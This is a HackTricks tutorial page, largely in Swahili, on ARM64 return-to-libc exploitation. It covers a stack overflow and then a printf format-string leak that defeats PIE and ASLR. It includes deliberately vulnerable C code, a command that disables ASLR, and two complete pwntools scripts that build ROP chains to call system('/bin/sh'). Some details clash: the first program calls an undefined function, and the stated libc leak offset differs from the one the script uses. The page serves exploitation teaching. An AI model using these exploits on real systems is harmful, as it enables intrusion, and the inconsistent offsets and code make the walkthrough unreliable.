Ret2lib + Printf leak - ARM64

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Ret2lib - NX bypass with ROP (no ASLR)

#include <stdio.h>

void bof()
{
char buf[100];
printf("\nbof>\n");
fgets(buf, sizeof(buf)*3, stdin);
}

void main()
{
printfleak();
bof();
}

Kujenga bila canary:

clang -o rop-no-aslr rop-no-aslr.c -fno-stack-protector
# Disable aslr
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Pata offset - x30 offset

Kwa kuunda pattern kwa pattern create 200, kuitumia, na kukagua offset kwa pattern search $x30, tunaweza kuona kwamba offset ni 108 (0x6c).

Tukitazama main function iliyofanyiwa disassembly tunaweza kuona kwamba tungetaka jump hadi instruction inayofanya jump kwa printf moja kwa moja, ambayo offset yake kutoka sehemu binary inapakiwa ni 0x860:

Pata system na /bin/sh string

Kwa kuwa ASLR imezimwa, anwani zitakuwa daima zile zile:

Pata Gadgets

Tunahitaji kuwa na ndani ya x0 anwani ya string /bin/sh na kuita system.

Tukitumia rooper, gadget ya kuvutia ilipatikana:

0x000000000006bdf0: ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;

Gadget hii itasoma x0 kutoka $sp + 0x18 kisha itasoma anwani za x29 na x30 kutoka sp na kuruka kwenda x30. Kwa hivyo kwa gadget hii tunaweza kudhibiti hoja ya kwanza na kisha kuruka kwa system.

Exploit

from pwn import *
from time import sleep

p = process('./rop')  # For local binary
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
libc.address = 0x0000fffff7df0000
binsh = next(libc.search(b"/bin/sh")) #Verify with find /bin/sh
system = libc.sym["system"]

def expl_bof(payload):
p.recv()
p.sendline(payload)

# Ret2main
stack_offset = 108
ldr_x0_ret = p64(libc.address + 0x6bdf0) # ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;

x29 = b"AAAAAAAA"
x30 = p64(system)
fill = b"A" * (0x18 - 0x10)
x0 = p64(binsh)

payload = b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0
p.sendline(payload)

p.interactive()
p.close()

Ret2lib - NX, ASL & PIE bypass kwa printf leaks kutoka kwenye stack

#include <stdio.h>

void printfleak()
{
char buf[100];
printf("\nPrintf>\n");
fgets(buf, sizeof(buf), stdin);
printf(buf);
}

void bof()
{
char buf[100];
printf("\nbof>\n");
fgets(buf, sizeof(buf)*3, stdin);
}

void main()
{
printfleak();
bof();
}

Kujenga bila canary:

clang -o rop rop.c -fno-stack-protector -Wno-format-security

PIE na ASLR lakini hakuna canary

• Raundi 1:
• Leak ya PIE kutoka kwenye stack
• Tumia vibaya bof kurudi main
• Raundi 2:
• Leak ya libc kutoka kwenye stack
• ROP: ret2system

Printf leaks

Kwa kuweka breakpoint kabla ya kuita printf, inawezekana kuona kwamba kuna addresses za kurejea kwenye binary kwenye stack na pia libc addresses:

Ukijaribu offsets mbalimbali, the %21$p inaweza leak an address ya binary (PIE bypass) na %25$p inaweza leak an address ya libc:

Kwa kutoa address ya libc iliyoleak na base address ya libc, inawezekana kuona kwamba the offset ya the leaked address from the base is 0x49c40.

x30 offset

Tazama mfano uliotangulia kwani bof ni sawa.

Find Gadgets

Kama katika mfano uliotangulia, tunahitaji kuwa katika x0 address ya string /bin/sh na kuita system.

Kutumia rooper, gadget nyingine ya kuvutia ilipatikana:

0x0000000000049c40: ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;

Gadget hii itapakia x0 kutoka $sp + 0x78, kisha itapakia anwani za x29 na x30 kutoka sp na itaruka kwenda x30. Kwa hivyo tunaweza kwa gadget hii kudhibiti kigezo cha kwanza na kisha kuruka kwenda system.

Exploit

from pwn import *
from time import sleep

p = process('./rop')  # For local binary
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")

def leak_printf(payload, is_main_addr=False):
p.sendlineafter(b">\n" ,payload)
response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
if is_main_addr:
response = response[:-4] + b"0000"
return int(response, 16)

def expl_bof(payload):
p.recv()
p.sendline(payload)

# Get main address
main_address = leak_printf(b"%21$p", True)
print(f"Bin address: {hex(main_address)}")

# Ret2main
stack_offset = 108
main_call_printf_offset = 0x860 #Offset inside main to call printfleak
print("Going back to " + str(hex(main_address + main_call_printf_offset)))
ret2main = b"A"*stack_offset + p64(main_address + main_call_printf_offset)
expl_bof(ret2main)

# libc
libc_base_address = leak_printf(b"%25$p") - 0x26dc4
libc.address = libc_base_address
print(f"Libc address: {hex(libc_base_address)}")
binsh = next(libc.search(b"/bin/sh"))
system = libc.sym["system"]

# ret2system
ldr_x0_ret = p64(libc.address + 0x49c40) # ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;

x29 = b"AAAAAAAA"
x30 = p64(system)
fill = b"A" * (0x78 - 0x10)
x0 = p64(binsh)

payload = b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0
p.sendline(payload)

p.interactive()

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.